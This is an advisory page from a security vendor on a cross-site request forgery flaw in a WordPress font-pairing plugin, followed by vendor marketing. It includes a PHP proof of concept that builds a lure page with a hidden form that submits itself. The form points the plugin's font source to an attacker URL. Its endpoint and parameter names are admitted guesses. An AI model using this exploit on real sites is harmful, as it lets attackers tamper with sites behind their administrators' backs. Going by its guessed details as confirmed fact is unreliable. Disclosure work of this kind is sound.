Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-1086: Font Pairing Preview For Landing Pages <= 1.3 – Cross-Site Request Forgery to Settings Update (wp-font-pairing-preview)

CVE ID CVE-2026-1086
Plugin wp-font-pairing-preview
Severity Medium (CVSS 4.3)
CWE 352
Vulnerable Version 1.3
Patched Version
Disclosed March 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1086 (metadata-based):
The vulnerability is a classic Cross-Site Request Forgery (CWE-352) in the Font Pairing Preview For Landing Pages WordPress plugin. The root cause is missing nonce validation on the plugin’s settings update functionality. WordPress requires nonces (number used once) to verify that requests originate from authenticated users and not from malicious third-party sites. The plugin’s settings update handler lacks this verification.

Atomic Edge research infers the exploitation method from WordPress plugin patterns. The plugin likely registers an AJAX action or admin-post handler for saving settings. A typical endpoint would be /wp-admin/admin-ajax.php with the action parameter containing a value like ‘wp_font_pairing_preview_save_settings’. Alternatively, it could use /wp-admin/admin-post.php with a similar action parameter. The attacker crafts a malicious link or form that submits a POST request to this endpoint with modified font pairing parameters. When an administrator with appropriate capabilities clicks the link while authenticated, the request executes with the administrator’s privileges.

Confirmed facts from the CVE description: the vulnerability exists up to version 1.3, allows unauthenticated attackers to modify font pairing settings via CSRF, and requires tricking an administrator into performing an action like clicking a link. Inferred from CWE 352 and WordPress context: the vulnerable endpoint is likely an AJAX or admin-post handler without nonce validation. The fix requires adding a nonce check using wp_verify_nonce() and a corresponding nonce field in the settings form. The impact is limited to modification of the plugin’s font pairing settings (C:N/I:L/A:N in CVSS). Attackers could disrupt site design or inject malicious font URLs if the plugin allows external font sources, but the description confirms only settings modification.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1086 - Font Pairing Preview For Landing Pages <= 1.3 - Cross-Site Request Forgery to Settings Update
<?php
/**
 * Proof of Concept for CVE-2026-1086
 * Assumptions based on WordPress plugin patterns:
 * 1. Plugin uses admin-ajax.php for settings updates
 * 2. AJAX action name derives from plugin slug: 'wp_font_pairing_preview_save_settings'
 * 3. Settings parameters include 'font_pairing' or similar
 * 4. No nonce validation present (the vulnerability)
 *
 * This script generates an HTML page with a hidden form that auto-submits.
 * When visited by an authenticated administrator, it changes plugin settings.
 */

$target_url = 'https://vulnerable-site.com'; // CHANGE THIS

// Inferred parameter names based on plugin functionality
$ajax_action = 'wp_font_pairing_preview_save_settings';
$settings_param = 'font_pairing_settings';

// Malicious settings payload - changes to a different font pairing
$malicious_settings = array(
    'heading_font' => 'Malicious Font',
    'body_font' => 'Compromised Font',
    'font_source' => 'https://attacker.com/malicious-font.woff2' // If plugin allows external URLs
);

?>
<!DOCTYPE html>
<html>
<head>
    <title>Benign Looking Page</title>
</head>
<body>
    <h1>Click here for special offer</h1>
    <p>This page contains a hidden form that exploits CVE-2026-1086.</p>
    
    <form id="exploit_form" method="POST" action="<?php echo htmlspecialchars($target_url); ?>/wp-admin/admin-ajax.php">
        <input type="hidden" name="action" value="<?php echo htmlspecialchars($ajax_action); ?>">
        <input type="hidden" name="<?php echo htmlspecialchars($settings_param); ?>" value="<?php echo htmlspecialchars(json_encode($malicious_settings)); ?>">
        <!-- Additional inferred parameters that might be required -->
        <input type="hidden" name="save" value="1">
    </form>
    
    <script>
        // Auto-submit the form after a short delay
        setTimeout(function() {
            document.getElementById('exploit_form').submit();
        }, 2000);
    </script>
</body>
</html>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School